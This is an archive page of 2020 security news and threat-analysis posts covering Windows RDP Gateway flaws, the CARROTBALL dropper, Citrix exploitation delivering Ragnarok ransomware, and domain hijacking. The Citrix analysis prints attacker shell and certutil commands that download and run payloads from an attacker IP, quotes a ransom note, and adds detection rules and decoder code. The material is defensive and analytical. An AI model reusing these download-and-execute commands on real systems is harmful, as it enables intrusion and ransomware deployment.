Daily Archives: January 24, 2020

Expert released DOS Exploit PoC for Critical Windows RDP Gateway flaws

Danish security researcher Ollypwn has released DOS exploit PoC for critical vulnerabilities in the Windows RDP Gateway.

The Danish security researcher Ollypwn has published a proof-of-concept (PoC) denial of service exploit for the CVE-2020-0609 and CVE-2020-0610 vulnerabilities in the Remote Desktop Gateway (RD Gateway) component on Windows Server (2012, 2012 R2, 2016, and 2019) devices.

A Remote Desktop Gateway server is typically located in a corporate or private network and acts as the gateway through which RDP connections from an external network pass to reach a Remote Desktop server (Terminal Server) on the corporate or private network.

“A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” reads the advisories published by Microsoft.

“To exploit this vulnerability, an attacker would need to send a specially crafted request to the target system’s RD Gateway via RDP.”

Microsoft addressed the two vulnerabilities with the release of the January Patch Tuesday.

The PoC code released by the researcher also includes a built-in scanner for checking if a host is vulnerable to both CVE-2020-0609 and CVE-2020-0610 issues.

A Shodan search for vulnerable RDP Gateway servers exposed online returns over 15,500 results.


Experts suggest securing vulnerable RDP Gateway servers by installing the security updates ([1], [2]) released by Microsoft.

To mitigate the risk of exploitation it is possible to disable UDP transport or restrict access to the UDP port.

“Simply disabling UDP Transport, or firewalling the UDP port (usually port 3391) is sufficient to prevent exploitation,” explained the popular researcher Marcus Hutchins.

Microsoft is not aware of attacks in the wild exploiting the above vulnerabilities.

Pierluigi Paganini

(SecurityAffairs – RDP Gateway, hacking)

The post Expert released DOS Exploit PoC for Critical Windows RDP Gateway flaws appeared first on Security Affairs.

Threat Roundup for January 17 to January 24

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Jan 17 and Jan 24. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU01242020 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for January 17 to January 24 appeared first on Cisco Blogs.

For SMBs moving to the cloud, mindset and partners are key

Small and medium-sized businesses (SMBs) in Canada need to be proactive to overcome the barriers to adopting new technology. It’s a challenge for SMBs to develop a cloud strategy when many are just trying to keep their head above water, said Synnapex President and CEO Yoon-Soon Kim during a recent ITWC webinar. As a result,…

NK CARROTBALL dropper used in attacks on U.S. Govt Agency

A US Government agency was hit with a phishing attack attempting to deliver a new malware dropper dubbed CARROTBALL.

Security experts at Palo Alto Networks have uncovered a new malware dropper called CARROTBALL that was used in targeted attacks against a U.S. government agency and non-US foreign nationals.

Experts attribute the attack to the Konni Group, a North Korea-linked nation-state actor.

The attackers used a weaponized Microsoft Word document as a lure for the target; the phishing messages were sent from a Russian email address.

“Between July and October 2019, Unit 42 observed several malware families typically associated with the Konni Group (see Attribution section below for more details) used to primarily target a US government agency, using the ongoing and heightened geopolitical relations issues surrounding North Korea to lure targets into opening malicious email attachments.” reads the analysis published by Palo Alto Networks’s Unit42. “The malware families used in this campaign consisted mainly of malicious documents featuring CARROTBAT downloaders with SYSCON payloads, but also included a new malware downloader Unit 42 has dubbed CARROTBALL.”

This campaign, which the researchers call Fractured Statue, used six unique document lures sent from four unique Russian email addresses.

The subject of the emails featured articles written in Russian pertaining to ongoing geopolitical relations issues surrounding North Korea. Five documents involved in the campaign contained CARROTBAT downloaders, and one contained a CARROTBALL downloader. Both downloaders were used to deliver the second-stage SYSCON malware.

Experts pointed out that the campaign resembles the Fractured Block campaign first uncovered by Unit 42 in November 2018; for this reason, they tracked this campaign as Fractured Statue.

Experts identified three different phases of the Fractured Statue campaign; the CARROTBALL downloader was used only in the last one, which involved email messages with the subject “The investment climate of North Korea,” sent from the address “pryakhin20l0@mail[.]ru.”

“Also interesting to note is that the sender added multiple recipients to their email; one was an individual at a US government agency, and the other two individuals were non-US foreign nationals professionally affiliated with ongoing activities in North Korea” continues the analysis of the report.


Experts noticed that all of the malicious documents used in the campaign shared the same macro, which allowed attackers to determine the target’s Windows architecture, execute a command hidden in a textbox included in the document, and then clear the contents of the textboxes and save the document.

In the last wave of the campaign, attackers used a different macro that does not execute commands hidden in the document; instead, it relies on an embedded Windows binary.

“The October 2019 attack, however, differed significantly from the previous ones. Instead of reading from the contents of the document itself, the macros leveraged an embedded Windows executable in the form of hex bytes delimited via the ‘|’ character that ultimately acted as a dropper.” continues the analysis. “When the macro was executed, the hex bytes were split, converted to binary, and dropped onto disk as an executable.”

When the macro executed, the hex bytes would be split and converted to binary, then the downloader dubbed CARROTBALL is dropped on the disk.
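The format described above, a Windows executable stored in the macro as hex bytes delimited by the ‘|’ character, is easy to recognise and extract during triage. The following Python is an added example, not code from the Unit 42 report or from the malware: it locates such a blob in extracted VBA source, decodes it the way the post describes (split on ‘|’, convert each pair to a byte), checks for the MZ header and hashes the result so it can be compared with published indicators. The macro text and payload below are constructed for the example, and the 64-pair minimum run length is an arbitrary threshold chosen here.

```python
import hashlib
import re
from dataclasses import dataclass
from typing import List

# A run of at least 64 two-digit hex values separated by '|'. The threshold is an
# arbitrary choice for this example, so short delimited lists in ordinary macros
# are not reported.
PIPE_HEX_BLOB = re.compile(r"(?:[0-9A-Fa-f]{2}\|){63,}[0-9A-Fa-f]{2}")


@dataclass(frozen=True)
class EmbeddedBinary:
    offset: int          # character offset of the blob within the macro source
    size: int            # decoded size in bytes
    sha256: str          # hash of the decoded bytes, for comparison with IoCs
    looks_like_pe: bool  # decoded bytes begin with the 'MZ' DOS header


def decode_pipe_hex(blob: str) -> bytes:
    """Split on '|' and convert each hex pair to one byte, as the post describes."""
    return bytes(int(pair, 16) for pair in blob.split("|"))


def find_embedded_binaries(macro_source: str) -> List[EmbeddedBinary]:
    """Locate and decode every '|'-delimited hex blob in extracted VBA source."""
    found = []
    for match in PIPE_HEX_BLOB.finditer(macro_source):
        data = decode_pipe_hex(match.group(0))
        found.append(EmbeddedBinary(
            offset=match.start(),
            size=len(data),
            sha256=hashlib.sha256(data).hexdigest(),
            looks_like_pe=data[:2] == b"MZ",
        ))
    return found


# Constructed sample: a fake 'executable' (MZ header, every byte value once, a
# familiar DOS stub string) embedded in a macro the way the post describes.
# This is not real malware and not the CARROTBALL macro.
SAMPLE_PAYLOAD = b"MZ" + bytes(range(256)) + b"This program cannot be run in DOS mode"
SAMPLE_MACRO = (
    "Sub AutoOpen()\n"
    "    Dim s As String\n"
    + '    s = "' + "|".join(f"{b:02X}" for b in SAMPLE_PAYLOAD) + '"\n'
    + "End Sub\n"
)

# Constructed benign macro: a short delimited list that must not be reported.
BENIGN_MACRO = 'Sub Fill()\n    codes = "41|42|43|44"\nEnd Sub\n'


if __name__ == "__main__":
    for hit in find_embedded_binaries(SAMPLE_MACRO):
        print(f"offset={hit.offset} size={hit.size} pe={hit.looks_like_pe} sha256={hit.sha256}")
    print("benign hits:", find_embedded_binaries(BENIGN_MACRO))
```

In practice the VBA source would come from a macro extraction tool such as olevba; the hash of a recovered binary is what gets checked against the indicators in the report, and a blob that decodes to an MZ header inside a document is itself a strong signal regardless of hash.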

The name “Konni” identifies a Remote Access Trojan used in targeted campaigns carried out by North Korea-linked APT groups. Experts pointed out that as additional campaigns emerged that showed strongly overlapping TTPs but did not feature the Konni RAT, some experts started using the “Konni” moniker to refer to the actors behind the aggregated set of activity.

“Overall, the Fractured Statue campaign provides clear evidence that the TTPS discovered in Fractured Block are still relevant, and that the group behind the attacks still appears to be active.” concludes the report. “Additionally, development and use of the new downloader, CARROTBALL, alongside the more commonly observed malware delivery mechanism, CARROTBAT, may indicate that the previous methods employed by the group to successfully infect their targets are becoming less effective.”

Additional technical details are included in the report published by Unit 42.

Pierluigi Paganini

(SecurityAffairs – CARROTBALL, Fractured Statue)

The post NK CARROTBALL dropper used in attacks on U.S. Govt Agency appeared first on Security Affairs.

Mitsubishi Electric Discloses Major Data Breach

Mitsubishi Electric Corporation announced that it experienced a major data breach in June 2019 that has been traced back to a Chinese hacking group.

“[O]ur network has been subject to unauthorised access by third parties. We have confirmed that trade secrets may have leaked out,” the company announced in a brief press release January 20. 

The announcement from the electronics giant was released shortly after two Japanese newspapers, Nikkei and Asahi Shimbun, reported on the breach.

“The leaked information seems to include information on social infrastructure such as defense, electric power and railways, information on ordering and development of products with business partners, and materials from executive meetings,” reported Nikkei.

The company admitted that some data had been compromised, but denied that the data included defense contract and partner information. Japanese Secretary-General Yoshii Kan confirmed this in a press conference, stating that there was “no leak of sensitive information.”

According to Mitsubishi, the breach occurred as the result of a zero-day vulnerability in its anti-virus software that was exploited by hackers.

Asahi Shimbun has attributed the breach to Tick (also known as Bronze Butler and RedBaldKnight), a Chinese Advanced Persistent Threat (APT) group that has been linked to several other hacking campaigns against Japanese defense, biotech, and electronics companies.

The post Mitsubishi Electric Discloses Major Data Breach appeared first on Adam Levin.

New Bill Proposes NSA Surveillance Reforms

The newly-introduced bill targets the Patriot Act's Section 215, previously used by the U.S. government to collect telephone data from millions of Americans.

Choosing the right cloud for your business

By Hiren Parekh, Senior Director of Cloud Services, OVHcloud Introducing new company-wide initiatives can be daunting for CIOs, especially when it comes to assessing the best cloud environment for a business. While it’s no secret that IT managers consider the use of cloud services strategic to their business, implementing and maintaining these services isn’t always…

Nice Try: 501 (Ransomware) Not Implemented

An Ever-Evolving Threat

Since January 10, 2020, FireEye has tracked extensive global exploitation of CVE-2019-19781, which continues to impact Citrix ADC and Gateway instances that are unpatched or do not have mitigations applied. We previously reported on attackers’ swift attempts to exploit this vulnerability and the post-compromise deployment of the previously unseen NOTROBIN malware family by one threat actor. FireEye continues to actively track multiple clusters of activity associated with exploitation of this vulnerability, primarily based on how attackers interact with vulnerable Citrix ADC and Gateway instances after identification.

While most of the CVE-2019-19781 exploitation activity we’ve observed to this point has led to the deployment of coin miners or most commonly NOTROBIN, recent compromises suggest that this vulnerability is also being exploited to deploy ransomware. If your organization is attempting to assess whether there is evidence of compromise related to exploitation of CVE-2019-19781, we highly encourage you to use the IOC Scanner co-published by FireEye and Citrix, which detects the activity described in this post.

Between January 16 and 17, 2020, FireEye Managed Defense detected the IP address 45[.]120[.]53[.]214 attempting to exploit CVE-2019-19781 at dozens of FireEye clients. When successfully exploited, we observed impacted systems executing the cURL command to download a shell script with the file name ld.sh from 45[.]120[.]53[.]214 (Figure 1). In some cases this same shell script was instead downloaded from hxxp://198.44.227[.]126:81/citrix/ld.sh.


Figure 1: Snippet of ld.sh, downloaded from 45.120.53.214

The shell script, provided in Figure 2, searches for the python2 binary (Note: Python is only pre-installed on Citrix Gateway 12.x and 13.x systems) and downloads two additional files into a temporary directory: piz.Lan, an XOR-encoded data blob, and de.py, a Python script. The script then changes permissions and executes de.py, which decodes and decompresses piz.Lan. Finally, the script cleans up the initial staging files and executes scan.py, an additional script we will cover in more detail later in the post.

#!/bin/sh
rm $0
if [ ! -f "/var/python/bin/python2" ]; then
echo 'Exit'
exit
fi

mkdir /tmp/rAgn
cd /tmp/rAgn

curl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan
sleep 1
curl hxxp://45[.]120[.]53[.]214/de -o de.py
chmod 777 de.py
/var/python/bin/python2 de.py

rm de.py
rm piz.Lan
rm .new.zip
cd httpd
/var/python/bin/python2 scan.py -n 50 -N 40 &

Figure 2: Contents of ld.sh, a shell-script to download additional tools to the compromised system

piz.Lan -> .net.zip

Armed with the information gathered from de.py, we turned our attention to decoding and decompressing “.net.zip” (MD5: 0caf9be8fd7ba5b605b7a7b315ef17a0). Inside, we recovered five files, represented in Table 1:

Filename               Functionality           MD5
x86.dll                32-bit Downloader       9aa67d856e584b4eefc4791d2634476a
x64.dll                64-bit Downloader       55b40e0068429fbbb16f2113d6842ed2
scan.py                Python socket scanner   b0acb27273563a5a2a5f71165606808c
xp_eternalblue.replay  Exploit replay file     6cf1857e569432fcfc8e506c8b0db635
eternalblue.replay     Exploit replay file     9e408d947ceba27259e2a9a5c71a75a8

Table 1: Contents of the ZIP file ".new.zip", created by the script de.py

The contents of the ZIP were explained via analysis of the file scan.py, a Python scanning script that would also automate exploitation of identified vulnerable system(s). Our initial analysis showed that this script was a combination of functions from multiple open source projects or scripts. As one example, the replay files, which were either adapted or copied directly from this public GitHub repository, were present in the Install_Backdoor function, as shown in Figure 3:


Figure 3: Snippet of scan.py showing usage of EternalBlue replay files

This script also had multiple functions checking whether an identified system is 32- vs. 64-bit, as well as raw shell code to step through an exploit. The exploit_main function, when called, would appropriately choose between 32- or 64-bit and select the right DLL for injection, as shown in Figure 4.


Figure 4: Snippet of scan.py showing instructions to deploy 32- or 64-bit downloaders

I Call Myself Ragnarok

Our analysis continued by examining the capabilities of the 32- and 64-bit DLLs, aptly named x86.dll and x64.dll. At only 5,120 bytes each, these binaries performed the following tasks (Figure 5 and Figure 6):

  1. Download a file named patch32 or patch64 (respective to operating system bit-ness) from a hard-coded URL using certutil, a native tool used as part of Windows Certificate Services (categorized as Technique 11005 within MITRE’s ATT&CK framework).
  2. Execute the downloaded binary since1969.exe, located in C:\Users\Public.
  3. Delete the URL from the current user’s certificate cache.

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete

Figure 5: Snippet of strings from x86.dll

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete

Figure 6: Snippet of strings from x64.dll
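Both the ld.sh staging stage (Figure 2) and the certutil sequence embedded in the DLLs (Figures 5 and 6) leave recognisable process command lines, which is why Table 2 below lists signatures for them. As an added example, not from FireEye’s post or its products, the Python below runs a handful of rules over constructed process command-line records and reports which fired. The hostile records reuse the IP addresses and file names reported in this post; the benign ones are ordinary administrative use. Where a rule name matches a Table 2 signature name it is borrowed for readability only; the matching logic and the extra “cache cleanup” and “execution from C:\Users\Public” rules are this example’s own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed process command-line records (a hypothetical EDR export). The
# hostile entries use the IP addresses and file names reported in the post; the
# others are ordinary administrative use that must not fire.
SAMPLE_CMDLINES = [
    "certutil.exe -urlcache -split -f http://45.120.53.214/patch32 C:/Users/Public/since1969.exe",
    "cmd.exe /c C:/Users/Public/since1969.exe",
    "certutil -urlcache -f http://45.120.53.214/patch32 delete",
    "certutil.exe -verify -urlfetch C:\\certs\\server.cer",
    "curl http://198.44.227.126:81/citrix/ld.sh -o ld.sh",
    "curl -fsSL https://updates.example.invalid/status -o status.json",
    "/var/python/bin/python2 scan.py -n 50 -N 40",
]

# Rule names follow Table 2 where one exists; the regular expressions are this
# example's own. Lookaheads make the certutil rules independent of flag order.
RULES = {
    # certutil fetching a remote URL to disk (-urlcache -split -f <url> <file>)
    "CERTUTIL.EXE DOWNLOADER (UTILITY)": re.compile(
        r"\bcertutil(?:\.exe)?\b(?=.*-urlcache\b)(?=.*-split\b)(?=.*-f\s+\w+://)", re.I),
    # certutil removing the fetched URL from the user's cache (step 3 above)
    "CERTUTIL URL CACHE CLEANUP": re.compile(
        r"\bcertutil(?:\.exe)?\b(?=.*-urlcache\b)(?=.*\bdelete\b)", re.I),
    # curl retrieving a .sh file, as with ld.sh in Figure 2
    "CURL Downloading Shell Script": re.compile(
        r"\bcurl\b(?=.*\S+\.sh\b)", re.I),
    # cmd.exe launching an executable staged in the world-writable Public folder
    "EXECUTION FROM C:\\Users\\Public": re.compile(
        r"^\s*cmd(?:\.exe)?\s+/c\s+\S*C:[\\/]Users[\\/]Public[\\/]\S+\.exe\b", re.I),
}


@dataclass(frozen=True)
class Finding:
    rule: str
    cmdline: str


def scan_cmdlines(cmdlines: List[str]) -> List[Finding]:
    """Return one Finding per (rule, command line) pair that matches."""
    findings = []
    for line in cmdlines:
        for name, pattern in RULES.items():
            if pattern.search(line):
                findings.append(Finding(name, line))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per rule, the shape a triage dashboard would want."""
    counts: Dict[str, int] = {}
    for finding in findings:
        counts[finding.rule] = counts.get(finding.rule, 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_cmdlines(SAMPLE_CMDLINES)
    for finding in results:
        print(f"[{finding.rule}] {finding.cmdline}")
    print(summarize(results))
```

The benign certutil and curl records show the point of requiring the full argument combination rather than the binary name alone: certutil is used legitimately for certificate verification and curl for ordinary HTTPS fetches, so a rule keyed on the executable name would drown the Figure 5 and Figure 6 sequence in noise.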

Although neither patch32 nor patch64 were available at the time of analysis, FireEye identified a file on VirusTotal with the name avpass.exe (MD5: e345c861058a18510e7c4bb616e3fd9f) linked to the IP address 45[.]120[.]53[.]214 (Figure 8). This file is an instance of the publicly available Meterpreter backdoor that was uploaded on November 12, 2019. Additional analysis confirmed that this binary communicated to 45[.]120[.]53[.]214 over TCP port 1234.


Figure 7: VirusTotal graph showing links between resources hosted on or communicating with 45.120.53.214

Within the avpass.exe binary, we found an interesting PDB string that provided more context about the tool’s author: “C:\Users\ragnarok\source\repos\avpass\Debug\avpass.pdb”. Utilizing ragnarok as a keyword, we pivoted and were able to identify a separate copy of since1969.exe (MD5: 48452dd2506831d0b340e45b08799623) uploaded to VirusTotal on January 23, 2020. The binary’s compilation timestamp of January 16, 2020, aligns with our earliest detections associated with this threat actor.

Further analysis and sandboxing of this binary brought all the pieces together—this threat actor may have been attempting to deploy ransomware aptly named ‘Ragnarok’. We’d like to give credit to this Tweet from Karsten Hahn, who identified ragnarok-related artifacts on January 17, 2020, again aligning with the timeframe of our initial detection. Figure 8 provides a snippet of files created by the binary upon execution.


Figure 8: Ragnarok-related ransomware files

The ransom note dropped by this ransomware, shown in Figure 11, points to three email addresses.

6.it's wise to pay as soon as possible it wont make you more losses

the ransome: 1 btcoin for per machine,5 bitcoins for all machines

how to buy bitcoin and transfer? i think you are very good at googlesearch

asgardmaster5@protonmail[.]com
ragnar0k@ctemplar[.]com
j.jasonm@yandex[.]com

Attention:if you wont pay the ransom in five days, all of your files will be made public on internet and will be deleted

Figure 9: Snippet of ransom note dropped by “since1969.exe”

Implications

FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization. Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.

As previously mentioned, if you suspect your Citrix appliances may have been compromised, we recommend utilizing the tool FireEye released in partnership with Citrix.

Detect the Technique

Aside from CVE-2019-19781, FireEye detects the activity described in this post across our platforms, including named detections for Meterpreter and EternalBlue. Table 2 contains several specific detection names to assist in detection of this activity.

Signature Name
CERTUTIL.EXE DOWNLOADER (UTILITY)
CURL Downloading Shell Script
ETERNALBLUE EXPLOIT
METERPRETER (Backdoor)
METERPRETER URI (STAGER)
SMB - ETERNALBLUE

Table 2: FireEye Detections for activity described in this post

Indicators

Table 3 provides the unique indicators discussed in this post.

Indicator Type   Indicator                          Notes
Network          45[.]120[.]53[.]214
Network          198[.]44[.]227[.]126
Host             91dd06f49b09a2242d4085703599b7a7   piz.Lan
Host             01af5ad23a282d0fd40597c1024307ca   de.py
Host             bd977d9d2b68dd9b12a3878edd192319   ld.sh
Host             0caf9be8fd7ba5b605b7a7b315ef17a0   .new.zip
Host             9aa67d856e584b4eefc4791d2634476a   x86.dll
Host             55b40e0068429fbbb16f2113d6842ed2   x64.dll
Host             b0acb27273563a5a2a5f71165606808c   scan.py
Host             6cf1857e569432fcfc8e506c8b0db635   xp_eternalblue.replay
Host             9e408d947ceba27259e2a9a5c71a75a8   eternalblue.replay
Host             e345c861058a18510e7c4bb616e3fd9f   avpass.exe
Host             48452dd2506831d0b340e45b08799623   since1969.exe
Email Address    asgardmaster5@protonmail[.]com     From ransom note
Email Address    ragnar0k@ctemplar[.]com            From ransom note
Email Address    j.jasonm@yandex[.]com              From ransom note

Table 3: Collection of IOCs from this blog post

Does Your Domain Have a Registry Lock?

If you’re running a business online, few things can be as disruptive or destructive to your brand as someone stealing your company’s domain name and doing whatever they wish with it. Even so, most major Web site owners aren’t taking full advantage of the security tools available to protect their domains from being hijacked. Here’s the story of one recent victim who was doing almost everything possible to avoid such a situation and still had a key domain stolen by scammers.

On December 23, 2019, unknown attackers began contacting customer support people at OpenProvider, a popular domain name registrar based in The Netherlands. The scammers told the customer representatives they had just purchased from the original owner the domain e-hawk.net — which is part of a service that helps Web sites detect and block fraud — and that they were having trouble transferring the domain from OpenProvider to a different registrar.

The real owner of e-hawk.net is Raymond Dijkxhoorn, a security expert and entrepreneur who has spent much of his career making life harder for cybercrooks and spammers. Dijkxhoorn and E-HAWK’s CEO Peter Cholnoky had already protected their domain with a “registrar lock,” a service that requires the registrar to confirm any requested changes with the domain owner via whatever communications method is specified by the registrant.

In the case of e-hawk.net, however, the scammers managed to trick an OpenProvider customer service rep into transferring the domain to another registrar with a fairly lame social engineering ruse — and without triggering any verification to the real owners of the domain.

Specifically, the thieves contacted OpenProvider via WhatsApp, said they were now the rightful owners of the domain, and shared a short screen grab video showing the registrar’s automated system blocking the domain transfer (see video below).

“The support agent helpfully tried to verify if what the [scammers] were saying was true, and said, ‘Let’s see if we can move e-hawk.net from here to check if that works’,” Dijkxhoorn said. “But a registrar should not act on instructions coming from a random email address or other account that is not even connected to the domain in question.”

Dijkxhoorn shared records obtained from OpenProvider showing that on Dec. 23, 2019, the e-hawk.net domain was transferred to a reseller account within OpenProvider. Just three days later, that reseller account moved e-hawk.net to another registrar — Public Domain Registry (PDR).

“Due to the previously silent move to another reseller account within OpenProvider, we were not notified by the registrar about any changes,” Dijkxhoorn said. “This fraudulent move was possible due to successful social engineering towards the OpenProvider support team. We have now learned that after the move to the other OpenProvider account, the fraudsters could silently remove the registrar lock and move the domain to PDR.”

REGISTRY LOCK

Dijkxhoorn said one security precaution his company had not taken with their domain prior to the fraudulent transfer was a “registry lock,” a more stringent, manual (and sometimes offline) process that effectively neutralizes any attempts by fraudsters to social engineer your domain registrar.

With a registry lock in place, your registrar cannot move your domain to another registrar on its own. Doing so requires manual contact verification by the appropriate domain registry, such as Verisign — which is the authoritative registry for all domains ending in .com, .net, .name, .cc, .tv, .edu, .gov and .jobs. Other registries handle locks for specific top-level or country-code domains, including Nominet (for .co.uk or .uk domains), EURID (for .eu domains), CNNIC (for .cn domains), and so on.

According to data provided by digital brand protection firm CSC, while domains created in the top three most registered top-level domains (.com, .jp and .cn) are eligible for registry locks, just 22 percent of domain names tracked in Forbes’ list of the World’s Largest Public Companies have secured registry locks.

Unfortunately, not all registrars support registry locks (a list of top-level domains that do allow registry locks is here, courtesy of CSC). But as we’ll see in a moment, there are other security precautions that can and do help if your domain somehow ends up getting hijacked.
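Whether a domain actually carries a registry lock, as opposed to the registrar lock E-HAWK already had, can be read from the EPP status codes shown in its WHOIS record: a registrar-side transfer lock normally appears as clientTransferProhibited, while registry lock services set the server-side codes serverUpdateProhibited, serverTransferProhibited and serverDeleteProhibited, which only the registry itself can clear. The Python below is an added example, not from this article or from CSC: it parses WHOIS-style output and classifies the lock level. The WHOIS text is constructed, and the mapping of status codes to lock levels is the common convention rather than something the article states.

```python
import re
from dataclasses import dataclass
from typing import List

# EPP status codes (RFC 5731) as they appear in WHOIS output. A registrar lock
# is normally a client-side transfer prohibition; registry lock services set all
# three server-side prohibitions, which the registrar cannot remove on its own.
REGISTRAR_LOCK_CODES = {"clientTransferProhibited"}
REGISTRY_LOCK_CODES = {
    "serverUpdateProhibited",
    "serverTransferProhibited",
    "serverDeleteProhibited",
}

# One "Domain Status:" line per code; the trailing ICANN URL is ignored.
STATUS_LINE = re.compile(r"^\s*Domain Status:\s*([A-Za-z]+)", re.M)


@dataclass
class LockAssessment:
    statuses: List[str]   # every EPP status code found, sorted
    registrar_lock: bool  # registrar-side transfer lock (what E-HAWK had)
    registry_lock: str    # "full", "partial" or "none"


def parse_statuses(whois_text: str) -> List[str]:
    """Extract the distinct EPP status codes from WHOIS-style output."""
    return sorted(set(STATUS_LINE.findall(whois_text)))


def assess_locks(whois_text: str) -> LockAssessment:
    """Classify the domain's protection from its status codes."""
    statuses = parse_statuses(whois_text)
    present = set(statuses)
    registrar = bool(present & REGISTRAR_LOCK_CODES)
    server_side = present & REGISTRY_LOCK_CODES
    if server_side == REGISTRY_LOCK_CODES:
        registry = "full"
    elif server_side:
        registry = "partial"  # some server-side codes, but not the complete set
    else:
        registry = "none"
    return LockAssessment(statuses, registrar, registry)


# Constructed WHOIS excerpts (hypothetical domains, not real records).
WHOIS_REGISTRY_LOCKED = """Domain Name: LOCKED-EXAMPLE.COM
Registrar: Example Registrar, Inc.
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
"""

WHOIS_REGISTRAR_LOCK_ONLY = """Domain Name: REGISTRAR-ONLY-EXAMPLE.NET
Registrar: Example Registrar, Inc.
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
"""

WHOIS_UNLOCKED = """Domain Name: OPEN-EXAMPLE.ORG
Registrar: Example Registrar, Inc.
Domain Status: ok https://icann.org/epp#ok
"""


if __name__ == "__main__":
    for name, text in [("registry locked", WHOIS_REGISTRY_LOCKED),
                       ("registrar lock only", WHOIS_REGISTRAR_LOCK_ONLY),
                       ("unlocked", WHOIS_UNLOCKED)]:
        result = assess_locks(text)
        print(f"{name}: registrar_lock={result.registrar_lock} "
              f"registry_lock={result.registry_lock} statuses={result.statuses}")
```

The distinction is exactly the one the article draws: a registrar-lock-only domain shows just the client-side code, which a compromised or socially engineered registrar account can remove, while a registry-locked domain shows the server-side set as well. RDAP responses express the same statuses in lower-case words with spaces (for example “server transfer prohibited”), so a check against RDAP output needs to normalise those first.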

Dijkxhoorn said his company first learned of the domain theft on Jan. 13, 2020, which was the date the fraudsters got around to changing the domain name system (DNS) settings for e-hawk.net. That alert was triggered by systems E-HAWK had previously built in-house that continually monitor their stable of domains for any DNS changes.

By the way, this continuous monitoring of one’s DNS settings is a powerful approach to help blunt attacks on your domains and DNS infrastructure. Anyone curious about why this might be a good approach should have a look at this deep-dive from 2019 on “DNSpionage,” the name given to the exploits of an Iranian group that has successfully stolen countless passwords and VPN credentials from major companies via DNS-based attacks.

DNSSEC

Shortly after pointing e-hawk.net’s DNS settings to a server they controlled, the attackers were able to obtain at least one encryption certificate for the domain, which could have allowed them to intercept and read encrypted Web and email communications tied to e-hawk.net.

But that effort failed because E-HAWK’s owners also had enabled DNSSEC for their domains (a.k.a. “DNS Security Extensions”), which protects applications from using forged or manipulated DNS data by requiring that all DNS queries for a given domain or set of domains be digitally signed.

With DNSSEC properly enabled, if a name server determines that the address record for a given domain has not been modified in transit, it resolves the domain and lets the user visit the site. If, however, that record has been modified in some way or doesn’t match the domain requested, the name server blocks the user from reaching the fraudulent address.

While fraudsters who have hijacked your domain and/or co-opted access to your domain registrar can and usually will try to remove any DNSSEC records associated with the hijacked domain, it generally takes a few days for these updated records to be noticed and obeyed by the rest of the Internet.

As a result, having DNSSEC enabled for its domains bought E-HAWK an additional 48 hours or so with which to regain control over its domain before any encrypted traffic to and from e-hawk.net could have been intercepted.

In the end, E-HAWK was able to wrest back its hijacked domain in less than 48 hours, but only because its owners are on a first-name basis with many of the companies that manage the Internet’s global domain name system. Perhaps more importantly, they happened to know key people at PDR — the registrar to which the thieves moved the stolen domain.

Dijkxhoorn said without that industry access, E-HAWK probably would still be waiting to re-assume control over its domain.

“This process is normally not that quick,” he said, noting that most domains can’t be moved for at least 60 days after a successful transfer to another registrar.

In an interview with KrebsOnSecurity, OpenProvider CEO and Founder Arno Vis said OpenProvider is reviewing its procedures and building systems to prevent support employees from overriding security checks that come with a registrar lock.

“We are building an extra layer of approval for things that support engineers shouldn’t be doing in the first place,” Vis said. “As far as I know, this is the first time something like this has happened to us.”

As in this case, crooks who specialize in stealing domains often pounce during holidays, when many registrars are short on well-trained staff. But Vis said the attack against E-HAWK targeted the company’s most senior support engineer.

“This is why social engineering is such a tricky thing, because in the end you still have a person who has to make a decision about something and in some cases they don’t make the right decision,” he said.

WHAT CAN YOU DO?

To recap, for maximum security on your domains, consider adopting some or all of the following best practices:

-Use registration features like Registry Lock that can help protect domain name records from being changed. Note that this may increase the amount of time it takes going forward to make key changes to the locked domain (such as DNS changes).

-Use DNSSEC (both signing zones and validating responses).

-Use access control lists for applications, Internet traffic and monitoring.

-Use 2-factor authentication, and require it to be used by all relevant users and subcontractors.

-In cases where passwords are used, pick unique passwords and consider password managers.

-Review the security of existing accounts with registrars and other providers, and make sure you have multiple notifications in place when and if a domain you own is about to expire.

-Monitor the issuance of new SSL certificates for your domains by monitoring, for example, Certificate Transparency Logs.

Forrester Study on the Benefits of Cloud vs. On-Premises AppSec

